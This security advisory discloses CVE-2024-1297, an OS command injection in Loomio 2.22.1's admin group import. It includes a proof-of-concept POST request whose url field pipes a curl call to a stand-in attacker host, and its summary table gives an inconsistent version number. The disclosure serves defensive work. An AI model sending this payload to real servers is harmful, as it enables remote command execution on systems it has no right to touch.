---
slug: advisories/stones/
title: Loomio 2.22.1 - Code injection
authors: Carlos Bello
writer: cbello
codename: stones
product: Loomio 2.22.1 - Code injection
date: 2024-02-29 12:00 COT
cveid: CVE-2024-1297
severity: 7.2
description: Loomio 2.22.1 - Remote Command Execution via Code injection
keywords: Fluid Attacks, Security, Vulnerabilities, RCE, Loomio, Code Injection, CVE
banner: advisories-bg
advise: yes
template: advisory
---

## Summary

<summary-table
    name="Loomio 2.4.1 - Code injection"
    code="[Stones](https://en.wikipedia.org/wiki/The_Rolling_Stones)"
    product="Loomio"
    affected-versions="Version 2.22.1"
    fixed-versions=""
    state="Public"
    release="2024-02-29">
</summary-table>

## Vulnerability

<vulnerability-table
    kind="OS Command Injection"
    rule="[404. OS Command Injection](https://help.fluidattacks.com/portal/en/kb/articles/criteria-vulnerabilities-404/)"
    remote="Yes"
    vector="CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H"
    score="7.2"
    available="Yes"
    id="[CVE-2024-1297](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-1297)">
</vulnerability-table>

## Description

Loomio version 2.22.1 allows executing arbitrary commands on the server.
This is possible because the application is vulnerable to OS Command Injection.

## Vulnerability

A command injection vulnerability has been identified in Loomio that allows an
attacker to obtain RCE on the server. This was made possible by sending a malicious
url to the server.

## Exploit

A malicious URL is sent to the server.

```txt
POST /admin/groups/import_json HTTP/2.0
Host: vulnerable.com
Content-Type: application/x-www-form-urlencoded
Content-Length: XX

url=|curl+'https://hacker.com/'
```

## Evidence of exploitation

* https://github.com/loomio/loomio/blob/master/app/views/admin/groups/import.haml#L1

![image](https://gist.github.com/assets/51862990/f92a7c4c-36fd-42db-b481-7b4935ddb69f)

* https://github.com/loomio/loomio/blob/master/app/admin/groups.rb#L214

![image](https://gist.github.com/assets/51862990/98e4de87-0f88-4795-8b6c-02d069e58689)

* https://github.com/loomio/loomio/blob/master/app/services/group_export_service.rb#L220

![image](https://gist.github.com/assets/51862990/3488a081-5b33-4b85-92c4-2a8ce38e7802)

## Our security policy

We have reserved the ID CVE-2024-1297 to refer to this issue from now on.

* https://fluidattacks.com/advisories/policy/

## System Information

* Version: Loomio 2.22.1

* Operating System: MacOS

## Mitigation

An updated version of Loomio is available at the vendor page.

## Credits

The vulnerability was discovered by [Carlos
Bello](https://www.linkedin.com/in/carlos-andres-bello) from Fluid Attacks'
Offensive Team.

## References

**Vendor page** <https://github.com/loomio/loomio/>

**CVE addressed | Patch** <https://github.com/loomio/loomio/commit/6bc5429bfb5a9c7c811a4487d97ea54a8b23a0fa#diff-b9a7e6b3dfb0fd855c11198a7c53e6f6f90945f28c78cc5dbd960d04d5d28203>

## Timeline

<time-lapse
  discovered="2024-02-12"
  contacted="2024-02-12"
  replied="2024-02-19"
  confirmed="2024-02-25"
  patched="2024-02-25"
  disclosure="2024-02-29">
</time-lapse>
